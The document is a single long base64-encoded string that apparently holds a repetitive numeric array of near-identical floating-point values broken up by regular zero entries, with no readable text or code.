4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4l